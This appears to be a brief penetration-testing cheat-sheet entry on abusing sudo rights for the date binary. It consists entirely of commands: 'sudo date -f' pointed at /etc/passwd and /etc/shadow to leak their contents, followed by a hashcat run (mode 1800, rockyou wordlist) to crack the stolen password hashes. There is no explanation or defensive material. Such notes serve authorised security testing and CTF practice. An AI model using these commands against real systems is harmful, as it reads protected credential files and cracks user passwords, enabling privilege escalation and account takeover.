/usr/bin/date

#Read /etc/passwd

LFILE=/etc/passwd

sudo date -f $LFILE

#Read /etc/shadow

LFILE=/etc/shadow

sudo date -f $LFILE

#Crack /etc/shadow hash

sudo hashcat -m 1800 -O hash.txt rockyou.txt

Last updated